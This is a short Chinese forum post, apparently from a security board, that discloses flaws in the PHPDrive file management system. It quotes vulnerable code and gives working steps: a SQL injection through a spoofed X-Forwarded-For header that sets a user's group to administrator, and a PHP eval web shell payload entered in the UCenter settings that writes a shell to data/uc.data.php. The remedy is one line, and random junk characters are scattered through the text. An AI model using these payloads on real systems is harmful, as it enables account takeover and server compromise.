PHPDrive 是一套运行于 PHP 环境的文件管理系统,可以应用于网盘、企业文件管理、学校、团队管理、软件站、文件CMS等
& Y C+ U5 N5 p; m+ { C$ k7 W. ?& ^9 Q* A6 L$ v
includes/user.lib.php2 {$ w6 U: P# P% h4 F
行872 M1 E( u9 T" o0 Z
function get_ip() {4 ^" X+ R. u4 O) }, V) ]3 G
if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])&&$_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];.2 n+ x' `8 D0 m' g" @3 j( R
在用户注册与登录 处module/disk/account.lead.php
Y* M$ R0 v. p: L" D( t i' V! J3 @+ q198行 & }' C9 f, C3 j j$ R, f9 t2 a7 x: ^; ]
//更新本次登录IP和时间 y9 _* |- y N! K
$db->Query(‘UPDATE `’.$db->TPre.’user` SET `before_last_date` = ‘.$UserArr['last_date'].’,`last_date` = ‘.$NowUnixTime.’,`before_last_ip` = “‘.$UserArr['last_ip'].’”,`last_ip` = “‘.get_ip().’” WHERE `uid` = ‘.$UserArr['uid'].’;');//get_ip()入库注入产生
) g5 v3 K9 h, ^& G* J: D6 o& K- S由于本套程序user与manager是存在于同一个表下的,只是用group字段来区分两者,group=1为管理员,2则为普通用户。所以可以利用以上注入,将普通用户的group值改为1,即可提升权限8 g, h0 f, g, a7 v( g3 d9 T3 |
实现方法:使用firefox的一款插件x-forwarded-for Header 1.0,将你的IP地址改为123″,`group`=”1然后登陆,这时候你就是管理员了.
% ^$ C a- a4 `后台getshell:2 R5 a( K4 R1 {- F- O w8 l
在UCenter设置处,将UC数据库登录名填写为8 \3 w% A, a, n
8 B4 F, } a' }% f2 nroot’);eval($_POST[DisKill]);?>/*1 B- F5 K+ s2 j4 Q: \3 H4 H2 e
可以得到一个shell,位置在 data/uc.data.php
4 E( w+ e6 J/ \4 [
! C- Y, d5 `0 H2 { t% @/ T5 Z修复:过滤注入; c# T. b2 k% R
& ^% n( Q/ g+ ~, p
|
发表于 2012-12-31 09:18:34
收藏
支持
反对